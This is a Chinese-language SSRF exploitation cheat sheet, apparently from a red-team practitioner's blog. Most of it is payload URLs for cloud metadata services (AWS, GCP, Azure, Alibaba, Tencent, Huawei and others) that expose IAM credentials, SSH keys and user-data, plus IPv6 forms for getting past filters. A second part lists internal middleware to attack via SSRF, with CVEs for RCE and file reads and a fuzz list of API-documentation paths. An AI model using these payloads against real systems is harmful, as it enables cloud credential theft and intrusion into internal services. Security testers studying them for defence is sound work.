前言
SSRF漏洞在互联网公司中应该是除了越权之外最普遍的漏洞了。关于漏洞的原理,绕过,传统的扫端口、各种探测等利用方式等就不再赘述,这里分享下自己作为攻防当中常用的一些SSRF的利用途径。
0x01 Cloud Metadata
就是各种云上的元数据信息,有些可直接拿到主机权限,有些可获取一些敏感信息。
1.1 AWS
# http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key | |
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key | |
# ECS Task : https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint-v2.html | |
http://169.254.170.2/v2/credentials/ |
1.2 Google Cloud
# https://cloud.google.com/compute/docs/metadata | |
# - Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" on API v1 | |
http://169.254.169.254/computeMetadata/v1/ | |
http://metadata.google.internal/computeMetadata/v1/ | |
http://metadata/computeMetadata/v1/ | |
http://metadata.google.internal/computeMetadata/v1/instance/hostname | |
http://metadata.google.internal/computeMetadata/v1/instance/id | |
http://metadata.google.internal/computeMetadata/v1/project/project-id | |
# kube-env; thanks to JackMc for the heads up on this (https://hackerone.com/reports/341876) | |
http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env | |
# Google allows recursive pulls | |
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true | |
# returns root password for Google | |
http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json |
1.3 Digital Ocean
# https://developers.digitalocean.com/documentation/metadata/ | |
http://169.254.169.254/metadata/v1.json | |
http://169.254.169.254/metadata/v1/ | |
http://169.254.169.254/metadata/v1/id | |
http://169.254.169.254/metadata/v1/user-data | |
http://169.254.169.254/metadata/v1/hostname | |
http://169.254.169.254/metadata/v1/region | |
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address |
1.4 Packetcloud
https://metadata.packet.net/userdata
1.5 Azure
# https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service | |
# Header: "Metadata: true" | |
# (Old) https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/ | |
http://169.254.169.254/metadata/instance?api-version=2017-04-02 | |
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text |
1.6 Oracle Cloud
# https://docs.us-phoenix-1.oraclecloud.com/Content/Compute/Tasks/gettingmetadata.htm | |
http://169.254.169.254/opc/v1/instance/ | |
# https://docs.oracle.com/en/cloud/iaas/compute-iaas-cloud/stcsg/retrieving-instance-metadata.html | |
http://192.0.0.192/latest/ | |
http://192.0.0.192/latest/user-data/ | |
http://192.0.0.192/latest/meta-data/ | |
http://192.0.0.192/latest/attributes/ |
1.7 阿里云
# https://www.alibabacloud.com/help/faq-detail/49122.htm | |
http://100.100.100.200/latest/meta-data/ | |
http://100.100.100.200/latest/meta-data/instance-id | |
http://100.100.100.200/latest/meta-data/image-id |
1.8 OpenStack
# https://docs.openstack.org/nova/latest/user/metadata-service.html | |
http://169.254.169.254/openstack | |
http://169.254.169.254/openstack/2012-08-10/meta_data.json | |
http://169.254.169.254/openstack/2018-08-27/network_data.json |
1.9 Kubernetes
# Debug Services (https://kubernetes.io/docs/tasks/debug-application-cluster/debug-service/) | |
https://kubernetes.default.svc.cluster.local | |
https://kubernetes.default | |
# https://twitter.com/Random_Robbie/status/1072242182306832384 | |
https://kubernetes.default.svc/metrics |
1.10 腾讯云
# https://cloud.tencent.com/document/product/213/4934 | |
http://metadata.tencentyun.com/latest/meta-data/ | |
http://169.254.0.23/latest/meta-data/ | |
http://100.88.222.5/ |
1.11 IPv6 Tests
大部分云主机都是支持IPv6的,所以绕过的时候可以尝试下
http://[::ffff:169.254.169.254] | |
http://[0:0:0:0:0:ffff:169.254.169.254] |
1.12 华为云
# https://support.huaweicloud.com/usermanual-ecs/ecs_03_0166.html | |
http://169.254.169.254/openstack/latest/meta_data.json | |
http://169.254.169.254/openstack/latest/user_data | |
http://169.254.169.254/openstack/latest/network_data.json | |
http://169.254.169.254/openstack/latest/securitykey |
0x02 中间件
利用SSRF攻击传统的组件、CMS等的常用途径不再赘述,这里举一些在大部分互联网公司中常用的 能够被SSRF进一步利用的中间件。
2.1 Apollo
利用点:
- 未授权访问
- 伪造客户端访问服务端,容易泄漏配置信息 · Issue #2099 · apolloconfig/apollo · GitHub 直接获取各种配置信息,各种账密、AK、数据库等
2.2 Erueka
利用点:
- 未授权访问
- Erueka未授权访问漏洞。通过内网Eruaka未授权,可获取到大量注册的应用,若运气好,直接可定位到核心组件和核心服务。
2.3 JumpServer
利用点:
- RCE:
- JumpServer远程代码执行漏洞。JumpServer的这个漏洞最开始基本上都是在Nginx层做的拦截,如果直接找到Jumpserver的后端端口,可直接尝试利用漏洞RCE。
2.4 Grafana
利用点:
- 文件读取
- CVE-2021-43798任意文件读取。内网的组件大多比较脆弱,直接读Grafana的DB文件,得到的基本上都是比较重要的DB账号密码。
2.5 K8s
利用点:
- 各种未授权访问
- 这个比较大,不一一说了,纯属看运气了。比如常见的:API Server / etcd / kubectl proxy / kubelet / Docker Remote API / dashboard等等等
2.6 大数据相关
利用点:
- 未授权访问
- 文件读取
- RCE
大数据生态组件也非常多,大多利用未授权访问、文件读取漏洞进行信息获取,部分可进行RCE。
2.7 SpringBoot Actuator
利用点:
-
未授权访问:
- 很多Actuator的端点拦截只是对外网而言,有些是在Nginx过滤了 或者在 filter设置的只允许内部网络访问,通过SSRF就可以直接未授权获取各种数据,直接下载heapdump获取数据。
-
文件读取:
- Logview CVE-2021-21234
-
RCE:
- Gateway SPEL 代码注入 (CVE-2022-22947)
- 修改env端点属性
- eureka xstream deserialization
- SnakeYAML RCE
- Jolokia Realm JNDI RCE
- H2 RCE
2.8 内网业务应用
这里有个小技巧,先搞应用的API文档,大部分内网调用的服务很多都不做权限校验的,直接请求接口运气好的直接搞到核心数据
API文档的Fuzz URI
doc.html | |
swagger-ui.html | |
swagger/swagger-ui.html | |
api/swagger-ui.html | |
api/doc.html | |
swagger/index.html | |
druid/index.html | |
spring-security-rest/api/swagger-ui.html | |
spring-security-oauth-resource/swagger-ui.html | |
swagger/v1/swagger.json | |
swagger/v2/swagger.json | |
api-docs | |
v1/api-docs | |
v2/api-docs | |
... |
2.9 Confluence
利用点:
- SPEL RCE
- CVE-2021-26084 Remote Code Execution on Confluence Servers
2.10 Elasticsearch
利用点:
-
未授权访问:
- 运气好的直接搞到运维或中间件的ES
- 是应用ES的话找访问日志的索引和操作日志的索引
- 是运维ES的话找应用stdout/stderr/logback等的索引
- 运气好的直接搞到运维或中间件的ES
-
RCE:
- log4j(我不会告诉你 国内TOP3云厂商卖的ES服务还有log4j漏洞呢)
2.11 阿里Druid
利用点:
- 未授权访问
- 找URI
- 找Session
- 找SQL(往SQL注入靠)
2.12 Apache Druid
利用点:
- 未授权访问
- Dashboard
- 文件读取
- CVE-2021-36749 Apache Druid LoadData 任意文件读取
- RCE
- Apache Druid 远程代码执行漏洞(CVE-2021-26919)
- 结合未授权 Apache Druid 命令执行漏洞(CVE-2021-25646)
2.13 APISIX
利用点:
- 未授权访问
- CVE-2021-45232 APISIX Dashboard未授权访问漏洞
2.14 Jenkins
利用点:
- 未授权访问
- Groovy 脚本控制台 RCE
- RCE
- CVE-2018-1000861
- CVE-2019-1003000
- 参考:瓦都尅'Blog